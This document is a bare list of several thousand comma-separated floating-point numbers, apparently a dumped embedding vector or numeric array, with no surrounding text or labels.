-0.020546630024909973, -0.029032981023192406, 0.0031530591659247875, 0.014026627875864506, -0.022105911746621132, 0.007899896241724491, 0.021871328353881836, 0.011591114103794098, -0.009831748902797699, -0.029419351369142532, 0.03819548338651657, 0.0025855775456875563, -0.005388488061726093, 0.0005842990940436721, -0.0020646671764552593, 0.010852870531380177, -0.005616170819848776, -0.030550865456461906, 0.0014005929697304964, -0.007589420303702354, -0.02325122430920601, 0.0464196540415287, -0.026521572843194008, 0.0026235245168209076, -0.023982567712664604, 0.05221521109342575, -0.02163674682378769, 0.026673361659049988, 0.0209330003708601, -0.02845342643558979, 0.010459600947797298, -0.01962210051715374, 0.01836639642715454, -0.005643768701702356, -0.0004514842585194856, 0.004457059316337109, 0.03913380950689316, 0.019387518987059593, 0.00196634978055954, -0.04614367336034775, -0.01301240548491478, -0.015813590958714485, -0.0072030494920909405, -0.027666885405778885, 0.013543665409088135, -0.010445801541209221, -0.005616170819848776, 0.03827827423810959, -0.014199115335941315, 0.012950310483574867, 0.00799648929387331, -0.012308659963309765, 0.0049158744513988495, -0.009569568559527397, 0.011211642995476723, 0.017579857259988785, 0.0019077042816206813, 0.003912000916898251, -0.023623794317245483, -0.007644616067409515, 0.0019697993993759155, -0.007485928013920784, -0.006644192151725292, -0.008017187006771564, 0.0029409003909677267, -0.0054436842910945415, 0.009383282624185085, 0.04586769640445709, 0.008417356759309769, -0.02527966909110546, -0.01825600489974022, 0.007651515305042267, 0.005026265978813171, -0.011377230286598206, 0.006430308800190687, 0.010714881122112274, 0.011549717746675014, 0.0017438417999073863, 0.007106456905603409, -0.02053283154964447, 0.009755854494869709, 0.004657144192606211, 0.010859770700335503, -0.03154439106583595, 0.0025562546215951443, 0.031709976494312286, -0.014668279327452183, 0.011535918340086937, -0.018228407949209213, 0.01871136948466301, 0.007699811831116676, -0.014061125926673412, 0.01775924302637577, -0.04263874143362045, 0.02672855742275715, 0.005992192309349775, 0.02334781549870968, 0.022864852100610733, 0.004412212874740362, -0.0019628999289125204, -0.007347938604652882, -0.014240511693060398, 0.014185315929353237, -0.03157198801636696, 0.015716999769210815, -0.0023578947875648737, 0.018228407949209213, -0.014916660264134407, -0.014019728638231754, 0.018035221844911575, -0.028674209490418434, -0.026852747425436974, 0.0020215455442667007, -0.03979615867137909, -0.0388578325510025, 0.021512556821107864, 0.0043708160519599915, -0.0051504564471542835, -0.037560731172561646, 0.0049331230111420155, -0.015758395195007324, 0.011570416390895844, 0.002359619829803705, 0.05729322135448456, -0.015661804005503654, 0.009031410329043865, -0.03209634870290756, 0.024686314165592194, 0.00313408556394279, -0.003980995621532202, 0.006544149946421385, -0.002482085255905986, -0.00993524119257927, 0.033724624663591385, 0.005616170819848776, 0.008300065994262695, 0.0444050058722496, 0.021098587661981583, -0.014026627875864506, -0.001341085066087544, -0.027915267273783684, -0.0368155874311924, -0.013660956174135208, -0.020712217316031456, 0.008086182177066803, -0.011811897158622742, 0.012025780975818634, -0.00725134601816535, -0.00915560033172369, 0.054561030119657516, -0.005754160229116678, 0.006837377790361643, -0.003404889954254031, 0.011991283856332302, -0.01329528447240591, -0.0048606786876916885, -0.019884280860424042, 0.03949258103966713, -0.01321939006447792, -0.01700030080974102, -0.009017610922455788, -0.01520643848925829, 0.012025780975818634, 0.03295188397169113, -0.03264830633997917, 0.008341462351381779, 0.03466295078396797, -0.010204320773482323, 0.00043013901449739933, -0.008727832697331905, 0.010087029077112675, -0.030633660033345222, 0.023140832781791687, -0.02632838860154152, 0.0317651741206646, -0.02129177376627922, 0.011466924101114273, -0.003397990483790636, 0.004846879746764898, -0.016876110807061195, -0.035794466733932495, 0.01851818524301052, -0.003867154475301504, 0.034580156207084656, 0.003040942596271634, 0.031903162598609924, -0.007182351313531399, 0.023527203127741814, 0.006771832704544067, 0.02250608056783676, -0.025500452145934105, -0.010480299592018127, -0.02072601579129696, 0.024437932297587395, 0.019911877810955048, 0.028812197968363762, 0.013412575237452984, 0.03146159648895264, 0.0014764871448278427, 0.01304000336676836, -0.022878652438521385, 0.0118532944470644, -0.0078033036552369595, -0.04382545128464699, -0.01705549657344818, -0.0005756747559644282, 0.002978847362101078, -0.02133316919207573, 0.004243175964802504, 0.012881316244602203, 0.0063130175694823265, -0.013729951344430447, 0.0072789439000189304, 0.006357864011079073, -0.01052169594913721, 0.01664152927696705, 0.03775391727685928, 0.00626817112788558, 0.030440473929047585, -0.014461294747889042, 0.015468617901206017, -0.02401016466319561, 0.03819548338651657, -0.02668716013431549, 0.0337798185646534, 0.006292319390922785, 0.017193486914038658, -0.020919201895594597, -0.0032393024303019047, 0.011411728337407112, 0.02294764667749405, -0.02704593352973461, -0.016172364354133606, -0.04495696350932121, 0.004405313637107611, -0.0007037462200969458, -0.0037602127995342016, 0.014364702627062798, 0.021001994609832764, -0.000842166889924556, 0.012791622430086136, 0.026769954711198807, -0.008865823037922382, 0.015344427898526192, 0.013095199130475521, -0.010294013656675816, 0.0015213338192552328, -0.004905525129288435, 0.012156871147453785, 0.012094776146113873, 0.012308659963309765, -0.004981419537216425, 0.019194332882761955, 0.00330484751611948, -0.001761952880769968, -0.019346121698617935, -0.00047347633517347276, 0.0005743810907006264, 0.00007589420420117676, 0.014433696866035461, -0.03954777866601944, -0.016130967065691948, -0.009624764323234558, 0.008175875060260296, -0.02739090658724308, -0.0018732069293037057, 0.003925799857825041, -0.013964532874524593, 0.012922712601721287, 0.04796513542532921, -0.03284149244427681, -0.01059069111943245, 0.032206740230321884, -0.02290624938905239, 0.05301554873585701, -0.0011254765558987856, -0.008817526511847973, -0.016958903521299362, -0.041038066148757935, 0.0055333771742880344, 0.0020232703536748886, 0.00726514495909214, -0.02906057983636856, 0.019290925934910774, 0.003211704548448324, -0.011818797327578068, -0.011294436641037464, 0.028315436094999313, -0.013660956174135208, -0.0022940747439861298, -0.024355139583349228, -0.005378139205276966, -0.029143372550606728, 0.0038257576525211334, -0.012812321074306965, -0.043715059757232666, 0.010031833313405514, 0.0036912178620696068, 0.0012298310175538063, -0.014695877209305763, -0.0037774613592773676, -0.0008538097608834505, -0.004122435115277767, -0.005364340264350176, -0.00039995380211621523, -0.0032548264134675264, -0.06380632519721985, -0.008431156165897846, 0.013453971594572067, -0.00686152558773756, 0.010259516537189484, 0.015165041200816631, -0.012253464199602604, 0.007706711068749428, -0.025652240961790085, 0.021498756483197212, -0.00004813460327568464, -0.0032720749732106924, 0.010328510776162148, 0.013674755580723286, 0.022782059386372566, -0.012708828784525394, -0.019746290519833565, 0.0048779272474348545, 0.021222777664661407, -0.037505533546209335, -0.042500752955675125, -0.00850015040487051, 0.0020681170281022787, -0.00981105025857687, 0.0007986139971762896, -0.00010052747529698536, -0.004256974905729294, 0.02038104273378849, 0.013157295063138008, -0.010300912894308567, 0.0009711008169688284, -0.020243054255843163, -0.005212551914155483, -0.020187856629490852, 0.008686436340212822, -0.008534647524356842, 0.001964624971151352, 0.03515971451997757, 0.006143980659544468, 0.024272345006465912, 0.016379348933696747, -0.02653537318110466, -0.0023889425210654736, 0.01574459671974182, -0.026093807071447372, 0.017124490812420845, 0.012191368266940117, 0.0068787746131420135, -0.00039197629666887224, -0.025003690272569656, -0.009486774913966656, 0.0009236669284291565, -0.020670820027589798, -0.008458754047751427, -0.007065060082823038, 0.007934393361210823, -0.013405675999820232, 0.029391754418611526, 0.030026506632566452, -0.005074562504887581, 0.005050414241850376, -0.007499726954847574, 0.005564424674957991, -0.01584118977189064, -0.01720728538930416, -0.009686860255897045, -0.019663497805595398, -0.02501748874783516, 0.007741208653897047, 0.035435691475868225, -0.0013428098754957318, -0.007258245255798101, -0.04222477227449417, -0.02410675771534443, 0.0023285720963031054, -0.005454033147543669, -0.010356108658015728, -0.013585061766207218, 0.012074077501893044, -0.01132893469184637, 0.028729405254125595, -0.009817949496209621, 0.0011263389606028795, -0.0029633236117661, 0.03173757344484329, -0.010397505946457386, -0.022768260911107063, -0.006468256004154682, -0.003518731100484729, -0.02674235589802265, -0.02794286422431469, -0.004774435423314571, -0.004201779142022133, 0.02285105362534523, 0.0009693759493529797, 0.02754269540309906, -0.029281362891197205, 0.03146159648895264, 0.011425526812672615, -0.01749706268310547, 0.0024130905512720346, -0.016061972826719284, -0.006409610155969858, 0.0025303817819803953, -0.01114954799413681, -0.007416933309286833, -0.014419898390769958, 0.018476787954568863, -0.00492967339232564, -0.010300912894308567, -0.015330628491938114, -0.003368667559698224, 0.011460024863481522, -0.033117469400167465, -0.01633795164525509, 0.0011349632404744625, 0.00796889141201973, -0.018380194902420044, 0.013074501417577267, 0.023127032443881035, 0.031599584966897964, -0.020105063915252686, 0.0014402649831026793, 0.0333106555044651, -0.03157198801636696, -0.0012660532956942916, -0.016462141647934914, -0.0015170215629041195, 0.008921018801629543, -0.0043708160519599915, -0.026452578604221344, 0.01190159097313881, -0.010459600947797298, 0.0007546298438683152, -0.009245293214917183, -0.01326768659055233, -0.004439810756593943, -0.0138748399913311, 0.006809779908508062, 0.03364183008670807, -0.011287537403404713, 0.021153783425688744, 0.027432303875684738, -0.00396029744297266, 0.003687768243253231, 0.003711916506290436, 0.0016248258762061596, 0.032620709389448166, 0.012018881738185883, 0.010997760109603405, 0.013605760410428047, -0.017745444551110268, 0.0056955148465931416, -0.010721780359745026, 0.001052169594913721, 0.002573503414168954, 0.02169194258749485, -0.015247834846377373, 0.016282755881547928, -0.002971947891637683, -0.0032168792095035315, 0.0337798185646534, -0.0348009392619133, -0.007699811831116676, 0.014337104745209217, 0.004463959019631147, 0.005036615300923586, -0.03676038980484009, -0.00847255252301693, -0.02249228209257126, 0.018587179481983185, -0.03394540771842003, -0.03899582102894783, -0.02325122430920601, -0.03496652841567993, 0.005447133909910917, 0.041645217686891556, 0.012018881738185883, 0.0006407885230146348, -0.018531983718276024, 0.012770923785865307, -0.021264174953103065, -0.002057767705991864, -0.02864661067724228, -0.02189892716705799, 0.013426373712718487, 0.015827391296625137, 0.003087514080107212, 0.008272468112409115, -0.0012237939517945051, 0.030385278165340424, 0.022809656336903572, -0.013157295063138008, 0.018738968297839165, -0.02668716013431549, 0.01366785541176796, -0.03413859009742737, -0.004084487911313772, 0.005371239501982927, 0.00792059488594532, -0.017179686576128006, 0.017124490812420845, 0.020670820027589798, -0.0001535132760182023, 0.011687707155942917, -0.014764871448278427, 0.006737335119396448, -0.02643878012895584, 0.020463837310671806, -0.016420746222138405, 0.02416195347905159, -0.035187311470508575, -0.01755225844681263, 0.015951581299304962, 0.017069295048713684, -0.000397582130972296, -0.032510317862033844, -0.009721357375383377, -0.009824849665164948, 0.012743325904011726, -0.013081400655210018, -0.027114927768707275, -0.018076619133353233, -0.06441348046064377, 0.025058886036276817, -0.0037602127995342016, 0.009955938905477524, -0.023223625496029854, -0.019856682047247887, -0.008431156165897846, -0.007113356608897448, -0.034469764679670334, -0.018297402188181877, -0.004394964314997196, -0.013322882354259491, 0.008707134984433651, -0.00726514495909214, -0.02178853563964367, -0.009390182793140411, -0.01104605570435524, 0.006785631645470858, -0.003392815822735429, 0.01810421608388424, -0.009252193383872509, -0.009645462967455387, 0.007230647373944521, 0.006150879897177219, -0.012419051490724087, 0.016517337411642075, -0.015813590958714485, 0.0247139111161232, -0.0010168098378926516, -0.010852870531380177, -0.020670820027589798, -0.019001148641109467, -0.019484112039208412, 0.010804574936628342, 0.008872722275555134, -0.03822308033704758, 0.012646733783185482, -0.010735579766333103, 0.0008012012694962323, 0.01584118977189064, -0.013812744989991188, -0.022878652438521385, -0.0158963855355978, -0.0013290109345689416, -0.04167281463742256, -0.011294436641037464, -0.02189892716705799, -0.010197420604526997, 0.0837320014834404, -0.025183076038956642, -0.005395387765020132, 0.012350056320428848, 0.0038809534162282944, -0.002961598802357912, 0.030882040038704872, 0.014123220928013325, -0.0013928310945630074, -0.0021802333649247885, 0.017428068444132805, -0.0066027953289449215, -0.01624135859310627, -0.005202202592045069, 0.003798159770667553, 0.013364278711378574, -0.021954122930765152, -0.014185315929353237, -0.002309598494321108, 0.01700030080974102, 0.011377230286598206, -0.008824425749480724, -0.025045085698366165, 0.01170150563120842, -0.0037222655955702066, 0.0008585531613789499, -0.01998087391257286, -0.0017645402112975717, 0.0040810382924973965, -0.00198014872148633, 0.00032082549296319485, -0.02108478918671608, 0.016434544697403908, -0.022119710221886635, 0.01800762489438057, 0.008168975822627544, 0.026921743527054787, -0.029088176786899567, -0.012260363437235355, -0.029695332050323486, -0.00492967339232564, 0.0021302122622728348, -0.0008602780289947987, 0.038719840347766876, 0.0058059063740074635, 0.004036191385239363, -0.020008470863103867, -0.0032806992530822754, -0.013467771001160145, 0.004639895632863045, -0.0005316906026564538, -0.024838102981448174, 0.030081702396273613, 0.015330628491938114, -0.013502268120646477, 0.011577315628528595, -0.0035032073501497507, 0.0002800754737108946, 0.001310037449002266, 0.005526477936655283, 0.008058584295213223, 0.0016696724342182279, -0.005902498960494995, 0.011363431811332703, 0.004922773689031601, 0.012198268435895443, -0.011839495040476322, 0.013467771001160145, -0.012011982500553131, 0.007637716364115477, 0.03874744102358818, 0.0015480691799893975, -0.0013514342717826366, -0.012791622430086136, 0.00009788627357920632, 0.02053283154964447, 0.02511408179998398, 0.011729103513062, -0.0014618257991969585, -0.015661804005503654, -0.0008839949732646346, 0.002080191159620881, -0.021402165293693542, 0.02930895984172821, 0.003963747061789036, 0.030744051560759544, -0.027363309636712074, 0.0014031803002581, 0.039630573242902756, 0.0158963855355978, 0.02997131086885929, 0.03466295078396797, 0.009562669321894646, 0.01887695863842964, -0.015551411546766758, 0.026093807071447372, -0.012308659963309765, 0.015979178249835968, -0.029888516291975975, 0.007610118482261896, 0.0005368652055040002, 0.02229909598827362, 0.022575074806809425, 0.024962292984128, -0.010990859940648079, 0.0014325031079351902, 0.012218966148793697, 0.02693554200232029, -0.007423833012580872, 0.014695877209305763, -0.008990013040602207, 0.0022889000829309225, 0.011446225456893444, 0.0010038733016699553, -0.02104339189827442, 0.00976275373250246, 0.012764024548232555, 0.0029960961546748877, 0.01821460761129856, -0.010245717130601406, -0.030799247324466705, -0.023375414311885834, -0.0018904556054621935, -0.02482430264353752, 0.015565210953354836, -0.0020594927482306957, 0.0011427252320572734, 0.00492967339232564, 0.01998087391257286, 0.015441020019352436, 0.01104605570435524, 0.021553952246904373, 0.00494347233325243, 0.02199552021920681, 0.02925376407802105, -0.0059266472235322, 0.010556193068623543, 0.016158565878868103, 0.0030754399485886097, -0.0037153661251068115, -0.01810421608388424, 0.029088176786899567, -0.011549717746675014, -0.008507049642503262, -0.0015704925172030926, -0.01977388933300972, -0.019387518987059593, 0.021733339875936508, 0.01654493622481823, 0.01112195011228323, -0.003056466579437256, -0.008810627274215221, 0.01831120066344738, 0.00692362105473876, -0.019139137119054794, -0.013936934992671013, 0.015068449079990387, 0.003023694036528468, 0.018021423369646072, -0.006326816510409117, 0.024355139583349228, -0.010576891712844372, 0.0051504564471542835, 0.023789381608366966, -0.005109059624373913, 0.012053378857672215, -0.02446553111076355, -0.026314590126276016, -0.019387518987059593, -0.009631664492189884, 0.012232765555381775, -0.001286751707084477, -0.013171093538403511, 0.019249528646469116, -0.025252070277929306, 0.02199552021920681, -0.018490586429834366, -0.0184077937155962, 0.034938931465148926, -0.012143072672188282, -0.007099557667970657, 0.008658838458359241, -0.030909638851881027, -0.0003689061850309372, -0.00034497363958507776, -0.0009288415312767029, -0.011970585212111473, 0.0290053840726614, -0.04009973630309105, -0.0014454395277425647, 0.00558512331917882, 0.03223433718085289, -0.02028444968163967, -0.01977388933300972, 0.013757549226284027, 0.018945952877402306, -0.02017405815422535, -0.0060611870139837265, 0.008700234815478325, -0.01861477829515934, 0.007651515305042267, -0.021802334114909172, 0.008493251167237759, -0.008596743457019329, -0.021912725642323494, -0.023430610075592995, 0.004750287160277367, -0.025390060618519783, 0.005916297901421785, 0.006709737237542868, 0.014123220928013325, -0.01876656524837017, 0.00014661379100289196, -0.007209949195384979, 0.009521272964775562, -0.002759789116680622, -0.014461294747889042, -0.007472129072993994, 0.02355480007827282, -0.03113042190670967, -0.009300488978624344, 0.02320982702076435, 0.0017645402112975717, 0.003135810373350978, 0.025748832151293755, 0.013557463884353638, -0.0068753245286643505, -0.04363226518034935, 0.007575621362775564, -0.007244446314871311, -0.020243054255843163, -0.0026769954711198807, -0.012915813364088535, 0.001785238622687757, -0.005823154933750629, -0.018697571009397507, 0.00862434133887291, 0.010376807302236557, -0.010549293830990791, 0.00796889141201973, 0.022685466334223747, -0.006675240118056536, -0.014116321690380573, -0.014833866618573666, -0.007520425599068403, -0.0002807223063427955, 0.01654493622481823, -0.03703637048602104, -0.028812197968363762, 0.0028977785259485245, 0.013522966764867306, -0.024437932297587395, 0.028674209490418434, -0.012522542849183083, -0.003798159770667553, 0.02254747785627842, -0.009942140430212021, 0.036346424371004105, 0.038057491183280945, -0.006468256004154682, -0.005491980351507664, -0.015648003667593002, 0.015579009428620338, 0.004143133293837309, -0.0016593232285231352, 0.01195678673684597, -0.013585061766207218, 0.004836530424654484, -0.01639314740896225, 0.003253101371228695, 0.009348785504698753, 0.003970646765083075, 0.009293589740991592, -0.025045085698366165, -0.002985746832564473, 0.015716999769210815, 0.018904555588960648, -0.013529866002500057, -0.0023440958466380835, -0.007934393361210823, -0.018352597951889038, 0.007334139663726091, 0.0020525932777673006, -0.03435937315225601, 0.02950214594602585, -0.04484657198190689, -0.02850862219929695, -0.010487198829650879, -0.02657676860690117, -0.002644222928211093, -0.020712217316031456, 0.005454033147543669, 0.008410457521677017, -0.01749706268310547, -0.003918900620192289, 0.01846298947930336, -0.006430308800190687, 0.006357864011079073, 0.01107365358620882, -0.0060991342179477215, 0.016572533175349236, 0.007775705773383379, 0.014240511693060398, 0.011736003682017326, -0.030330082401633263, 0.004039641469717026, -0.0004223771102260798, -0.03692597895860672, -0.0013842066982761025, 0.024023965001106262, -0.00988694466650486, -0.012011982500553131, 0.009383282624185085, 0.006016340106725693, -0.01614476554095745, 0.002923651598393917, 0.030440473929047585, 0.010880468413233757, 0.01513744331896305, -0.0017748894169926643, -0.007927494123578072, -0.031102823093533516, 0.0029409003909677267, -0.008983113802969456, 0.015910184010863304, -0.01891835406422615, -0.006764933001250029, -0.0211813822388649, -0.009024510160088539, -0.01694510504603386, 0.006175028160214424, 0.013419474475085735, -0.0011366881662979722, -0.01369545329362154, -0.006554499268531799, -0.011211642995476723, 0.015441020019352436, 0.001893905340693891, -0.022864852100610733, 0.023541001603007317, -0.05105609819293022, 0.02446553111076355, -0.0022561275400221348, 0.01669672504067421, 0.0031616834457963705, -0.006233673542737961, 0.004501906223595142, 0.02325122430920601, -0.010197420604526997, -0.019594503566622734, -0.0035032073501497507, -0.01836639642715454, 0.021126186475157738, 0.011598014272749424, -0.012136172503232956, 0.004708890337496996, -0.008610541932284832, 0.005778308492153883, 0.013571263290941715, 0.0030926887411624193, -0.00029365881346166134, 0.009721357375383377, -0.002418265212327242, 0.02613520249724388, 0.025790229439735413, 0.004187980201095343, 0.0023923921398818493, 0.005961144343018532, 0.0016282756114378572, -0.02127797342836857, -0.0060059912502765656, -0.03612564131617546, 0.00016310784849338233, 0.02042244002223015, -0.0043328688479959965, 0.0143785011023283, 0.008596743457019329, -0.004067239351570606, -0.008375960402190685, 0.005560975056141615, -0.0007537673809565604, -0.025997214019298553, -0.0046433452516794205, 0.00659589609131217, -0.003811958711594343, 0.0317927710711956, 0.004346667788922787, 0.011025357991456985, -0.02336161583662033, -0.001918053487315774, 0.030357681214809418, -0.010342310182750225, -0.007134054787456989, 0.008996912278234959, -0.017883433029055595, 0.05533377081155777, 0.02205071598291397, -0.0052987951785326, -0.02457592263817787, -0.021581551060080528, 0.04503975808620453, -0.002518307650461793, 0.016282755881547928, 0.008162076584994793, -0.022809656336903572, 0.0021474608220160007, -0.016420746222138405, -0.02608000673353672, 0.03148919343948364, -0.03838866576552391, 0.008403558284044266, -0.004263874143362045, -0.006181927863508463, 0.005861102137714624, -0.0026304239872843027, 0.01248804572969675, 0.005084911361336708, 0.01887695863842964, -0.010342310182750225, 0.007465229835361242, 0.0013108998537063599, -0.012977908365428448, 0.0014359528431668878, 0.006375113036483526, 0.013985231518745422, -0.026011012494564056, -0.021319370716810226, -0.030550865456461906, -0.0112254424020648, -0.019332323223352432, 0.005564424674957991, -0.03237232565879822, 0.009355684742331505, 0.016613930463790894, 0.03435937315225601, 0.016558734700083733, -0.0138748399913311, -0.010845971293747425, -0.008962415158748627, -0.0012746775755658746, 0.018738968297839165, 0.008065483532845974, -0.030744051560759544, 0.01740046963095665, -0.01132893469184637, -0.040734488517045975, -0.01680711656808853, 0.01775924302637577, -0.010183622129261494, -0.027625489979982376, 0.021512556821107864, 0.012619135901331902, 0.02209211140871048, 0.012860617600381374, 0.005374689120799303, 0.0222025029361248, -0.013750649057328701, 0.020063666626811028, 0.015040851198136806, 0.018573381006717682, -0.022271499037742615, 0.01508224755525589, 0.005619620438665152, 0.00915560033172369, -0.012225866317749023, 0.026549171656370163, 0.014212913811206818, -0.003853355534374714, -0.002300974214449525, 0.005623070523142815, 0.010300912894308567, 0.012191368266940117, 0.003227228531613946, -0.000990936765447259, 0.024631118401885033, -0.0018024872988462448, -0.006288869306445122, 0.0058266050182282925, -0.018904555588960648, -0.02366519160568714, -0.0005592885427176952, 0.006723536178469658, -0.010845971293747425, 0.0075135258957743645, -0.027970463037490845, 0.0332830585539341, -0.006571747828274965, 0.006278520449995995, 0.009272891096770763, 0.011190945282578468, 0.02547285333275795, 0.004436361137777567, 0.012315559200942516, 0.029833320528268814, 0.009452277794480324, 0.02446553111076355, 0.006702837999910116, 0.003423863323405385, 0.02254747785627842, -0.007630817126482725, -0.03137880191206932, -0.016462141647934914, -0.001192746334709227, 0.021057190373539925, 0.01324008870869875, 0.039464984089136124, -0.02275446057319641, 0.01982908509671688, -0.0018369846511632204, 0.0032306781504303217, -0.0013367728097364306, -0.008320764638483524, -0.012225866317749023, 0.0013134871842339635, 0.0008563970914110541, 0.0034997574985027313, 0.0002529087942093611, 0.000701158947777003, 0.014068025164306164, -0.0029633236117661, -0.0003794710210058838, -0.002332021715119481, -0.008865823037922382, -0.0005791244911961257, -0.006526901386678219, 0.004733038600534201, 0.0009141801274381578, 0.00230787368491292, -0.010459600947797298, -0.013999029994010925, -0.008562245406210423, 0.0058059063740074635, -0.00792059488594532, -0.03444216772913933, -0.025003690272569656, -0.02955734170973301, -0.01505464967340231, 0.0056955148465931416, 0.0024130905512720346, -0.0043535674922168255, 0.012701929546892643, -0.0010323335882276297, -0.0034566358663141727, 0.021885128691792488, -0.0031565087847411633, 0.013447072356939316, -0.003087514080107212, -0.005316043738275766, -0.02058802731335163, 0.0026493975892663, -0.019746290519833565, -0.028977785259485245, 0.009666161611676216, 0.016475941985845566, 0.005564424674957991, -0.0010099103674292564, -0.019787687808275223, -0.016876110807061195, -0.005899049341678619, -0.017690248787403107, 0.003368667559698224, -0.003687768243253231, 0.008617441169917583, -0.004864128306508064, 0.0054781814105808735, -0.01192918885499239, -0.010190521366894245, -0.006306118331849575, 0.018090417608618736, -0.018269803375005722, 0.005502329673618078, -0.018642375245690346, 0.0064924038015306, 0.0028891542460769415, -0.0060784355737268925, 0.0017533284844830632, 0.01931852474808693, -0.01880796253681183, 0.015192639082670212, 0.005981842987239361, 0.009790351614356041, -0.0006666615372523665, 0.0006528625963255763, -0.009141801856458187, -0.021802334114909172, -0.01039060577750206, -0.0033031227067112923, -0.00045450276229530573, -0.021498756483197212, 0.010349209420382977, 0.009514372795820236, 0.03264830633997917, 0.0005472144111990929, -0.008355261757969856, -0.010638986714184284, -0.022133508697152138, -0.007354837842285633, -0.008714034222066402, 0.004187980201095343, -0.0038464560639113188, -0.008555346168577671, -0.002128487452864647, 0.006754584144800901, 0.009548870846629143, -0.012218966148793697, -0.010135325603187084, 0.021402165293693542, -0.026355985552072525, -0.02351340278983116, -0.016710523515939713, -0.005885250400751829, 0.0011125400196760893, -0.0017421168740838766, -0.00786539912223816, 0.014695877209305763, -0.004495006520301104, -0.0022820006124675274, -0.007051261141896248, -0.00209226505830884, -0.021319370716810226, -0.005405737087130547, 0.005905948579311371, 0.005164255388081074, -0.012743325904011726, 0.011867092922329903, 0.01755225844681263, 0.008141377940773964, -0.018725169822573662, -0.0036463714204728603, -0.009065907448530197, 0.006892573554068804, -0.000717545161023736, 0.001410942175425589, 0.02961253747344017, -0.0009616140159778297, 0.02003606967628002, -0.016531137749552727, 0.006564848590642214, 0.00781710259616375, -0.004125884734094143, -0.0019508259138092399, 0.002083640778437257, -0.0011651484528556466, -0.014806268736720085, 0.0012962385080754757, -0.01039060577750206, 0.0034997574985027313, 0.01694510504603386, -0.015165041200816631, 0.012667432427406311, 0.018421592190861702, 0.03353143855929375, -0.003235852811485529, -0.009955938905477524, 0.013833442702889442, -0.012750226072967052, 0.004698541015386581, -0.02562464214861393, -0.0029443500097841024, -0.017110692337155342, 0.0186699740588665, 0.012101675383746624, -0.014226713217794895, 0.0073824357241392136, 0.022630270570516586, -0.005802456755191088, 0.0038016096223145723, 0.03656720742583275, 0.017897233366966248, 0.012770923785865307, -0.016006777063012123, 0.014419898390769958, -0.013095199130475521, -0.015372025780379772, 0.008962415158748627, -0.01250874437391758, -0.017234882339835167, 0.00852774828672409, -0.015951581299304962, -0.012701929546892643, -0.018752766773104668, 0.023444408550858498, 0.012812321074306965, -0.021222777664661407, -0.0090797059237957, 0.003118561813607812, 0.007637716364115477, -0.014654479920864105, 0.003266900312155485, 0.008438055403530598, 0.018324999138712883, 0.026604367420077324, -0.034331776201725006, -0.014861464500427246, -0.023320218548178673, -0.03728475049138069, -0.014640681445598602, -0.0019059793557971716, -0.005040064919739962, 0.0008223309414461255, 0.00146613793913275, 0.0092038968577981, -0.013674755580723286, -0.01745566539466381, 0.0002524775918573141, 0.011591114103794098, 0.0029409003909677267, 0.015275432728230953, -0.0038464560639113188, 0.013136596418917179, 0.018421592190861702, 0.005854202900081873, 0.011239240877330303, -0.00329104857519269, -0.006219874601811171, -0.015965379774570465, -0.015399623662233353, -0.015951581299304962, -0.0003572633140720427, 0.0036601703613996506, -0.0058059063740074635, 0.011052955873310566, -0.007623917423188686, -0.014130120165646076, -0.006823578849434853, -0.009341886267066002, -0.006171578541398048, -0.022920049726963043, -0.00847255252301693, 0.021816132590174675, 0.012232765555381775, 0.03344864398241043, 0.009659262374043465, 0.006019790191203356, -0.000020577139366650954, -0.003375567030161619, 0.030633660033345222, -0.033062275499105453, -0.017179686576128006, 0.003867154475301504, 0.002518307650461793, -0.002309598494321108, 0.026397382840514183, 0.00620607566088438, -0.004695091396570206, 0.02547285333275795, -0.016006777063012123, -0.010480299592018127, -0.014185315929353237, 0.013405675999820232, -0.005078012123703957, 0.0006946906796656549, -0.020850207656621933, 0.010149125009775162, 0.01855958253145218, -0.015620406717061996, 0.02365139313042164, 0.008030986413359642, 0.0009711008169688284, -0.005184954032301903, 0.00246483669616282, 0.016917508095502853, -0.0015463443705812097, 0.01304000336676836, -0.0007692912477068603, -0.019249528646469116, 0.010632087476551533, -0.00519530288875103, 0.0038257576525211334, -0.0019111540168523788, -0.006106033455580473, -0.013509168289601803, 0.016669126227498055, -0.010707981884479523, -0.0084518538787961, -0.013888638466596603, 0.02249228209257126, -0.010287114419043064, 0.0016938205808401108, 0.008914118632674217, 0.01650353893637657, 0.002299249405041337, -0.014792469330132008, -0.015868786722421646, 0.030992431566119194, -0.019456513226032257, -0.01956690475344658, 0.004788234364241362, -0.00025075272424146533, -0.02603861130774021, -0.00860364269465208, -0.007879197597503662, -0.0239687692373991, -0.009755854494869709, 0.007989589124917984, 0.0003883109602611512, -0.01190849021077156, -0.015772195532917976, 0.016724321991205215, -0.0024907097686082125, 0.02007746510207653, -0.015220236964523792, -0.0073824357241392136, -0.01127373892813921, 0.014268109574913979, 0.012143072672188282, -0.0009581642807461321, 0.01912533864378929, -0.0010702806757763028, 0.000662349397316575, 0.010321611538529396, 0.0038395565934479237, -0.005540276877582073, -0.001692095771431923, -0.017621254548430443, -0.014833866618573666, -0.012626035138964653, 0.009141801856458187, 0.027128728106617928, 0.012149971909821033, 0.011915389448404312, 0.005861102137714624, -0.0006964155472815037, -0.0032065301202237606, 0.0035670273937284946, -0.008893420919775963, 0.013046903535723686, -0.033973004668951035, 0.01745566539466381, -0.006782182026654482, 0.007706711068749428, -0.012722628191113472, -0.026493975892663002, 0.014392300508916378, -0.010611388832330704, -0.014806268736720085, 0.00043531361734494567, -0.012957209721207619, -0.00865193922072649, -0.0034738846588879824, -0.018090417608618736, -0.0020094714127480984, 0.0211813822388649, 0.015703199431300163, 0.008003388531506062, 0.010949463583528996, 0.007444531191140413, -0.007013313937932253, -0.016586333513259888, -0.021208979189395905, 0.01911154016852379, 0.024037763476371765, -0.011239240877330303, 0.013233188539743423, -0.002197482157498598, 0.013812744989991188, 0.0030029956251382828, -0.02309943549335003, 0.005140107125043869, -0.005740361288189888, 0.00923149473965168, -0.0005209101946093142, -0.0169037077575922, -0.009252193383872509, 0.005719663109630346, -0.02159534953534603, -0.0011936088558286428, 0.023872176185250282, -0.02169194258749485, 0.011308236047625542, -0.016434544697403908, 0.010783876292407513, 0.022230101749300957, 0.009528172202408314, 0.014820067211985588, 0.000834405014757067, 0.00626817112788558, 0.0023199478164315224, -0.012474247254431248, 0.008175875060260296, 0.015868786722421646, 0.020339645445346832, -0.012087875977158546, 0.013019305653870106, -0.006588996388018131, -0.012046479620039463, 0.017980026081204414, 0.010942564345896244, 0.0008486351580359042, -0.03182036802172661, -0.007347938604652882, 0.002035344485193491, 0.014682077802717686, 0.023030441254377365, 0.0012125823413953185, -0.010314712300896645, 0.007686012890189886, 0.004312170669436455, 0.021126186475157738, -0.015344427898526192, 